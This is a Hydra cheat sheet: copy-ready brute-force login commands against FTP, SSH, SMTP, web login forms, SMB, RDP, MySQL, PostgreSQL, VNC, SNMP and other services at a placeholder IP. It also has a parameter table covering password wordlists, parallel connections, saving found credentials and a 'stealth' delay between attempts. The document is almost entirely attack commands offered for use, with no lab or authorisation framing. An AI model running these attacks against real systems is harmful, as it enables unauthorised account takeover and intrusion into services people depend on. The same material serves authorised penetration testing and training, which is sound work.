Hydra Cheat Sheet

Brute-Force Templates

21. FTP

hydra -L users.txt -P passwords.txt ftp://<IP>

Anonymous:

hydra -l anonymous -p anonymous ftp://<IP>

22. SSH

hydra -L users.txt -P passwords.txt ssh://<IP>

Custom port:

hydra -L users.txt -P passwords.txt ssh://<IP> -s 2222

25. SMTP

hydra -L users.txt -P passwords.txt smtp://<IP>

80. HTTP (POST)

hydra -L users.txt -P passwords.txt <IP> http-post-form "/login:username=^USER^&password=^PASS^:Invalid login"

80. HTTP (GET)

hydra -L users.txt -P passwords.txt <IP> http-get-form "/login.php?user=^USER^&pass=^PASS^:Invalid"

80. HTTP Basic Auth

hydra -L users.txt -P passwords.txt <IP> http-get /

110. POP3

hydra -L users.txt -P passwords.txt pop3://<IP>

139 / 445. SMB

hydra -L users.txt -P passwords.txt smb://<IP>

Domain:

hydra -L users.txt -P passwords.txt smb://<IP> -m WORKGROUP

143. IMAP

hydra -L users.txt -P passwords.txt imap://<IP>

443. HTTPS (POST)

hydra -L users.txt -P passwords.txt <IP> https-post-form "/login:username=^USER^&password=^PASS^:Invalid login"

443. HTTPS (GET)

hydra -L users.txt -P passwords.txt <IP> https-get-form "/login.php?user=^USER^&pass=^PASS^:Invalid"

3306. MySQL

hydra -L users.txt -P passwords.txt mysql://<IP>

3389. RDP

hydra -L users.txt -P passwords.txt rdp://<IP>

Domain:

hydra -L users.txt -P passwords.txt rdp://<IP> -m DOMAIN

5432. PostgreSQL

hydra -L users.txt -P passwords.txt postgres://<IP>

5900. VNC

hydra -P passwords.txt vnc://<IP>

161. SNMP

hydra -P community.txt snmp://<IP>

Parameters

Parameter	Example	Description
`-l`	`-l admin`	Attack only one user
`-L`	`-L users.txt`	Multiple usernames
`-p`	`-p password123`	One password
`-P`	`-P rockyou.txt`	Password wordlist
`-C`	`-C creds.txt`	`username:password` combos
`-u`	`-u`	Finish all passwords for one user before moving to the next
`-e nsr`	`-e nsr`	Try null / same / reversed password
`-t`	`-t 16`	Parallel connections (speed)
`-s`	`-s 2222`	Custom port
`-S`	`-S`	Use SSL/TLS
`-v`	`-v`	Show attempts
`-V`	`-V`	Show every credential tested
`-f`	`-f`	Stop after first valid login
`-o`	`-o found.txt`	Save results
`-R`	`-R`	Resume attack
`-I`	`-I`	Ignore restore file
`-w`	`-w 5`	Server response timeout
`-W`	`-W 1`	Delay between attempts (stealth)
`-M`	`-M targets.txt`	Multiple targets
`-m`	`-m`	Extra module options
`-U`	`hydra -U ssh`	Show module help

Documentation Index

​Brute-Force Templates

​21. FTP

​22. SSH

​25. SMTP

​80. HTTP (POST)

​80. HTTP (GET)

​80. HTTP Basic Auth

​110. POP3

​139 / 445. SMB

​143. IMAP

​443. HTTPS (POST)

​443. HTTPS (GET)

​3306. MySQL

​3389. RDP

​5432. PostgreSQL

​5900. VNC

​161. SNMP

​Parameters

Brute-Force Templates

21. FTP

22. SSH

25. SMTP

80. HTTP (POST)

80. HTTP (GET)

80. HTTP Basic Auth

110. POP3

139 / 445. SMB

143. IMAP

443. HTTPS (POST)

443. HTTPS (GET)

3306. MySQL

3389. RDP

5432. PostgreSQL

5900. VNC

161. SNMP

Parameters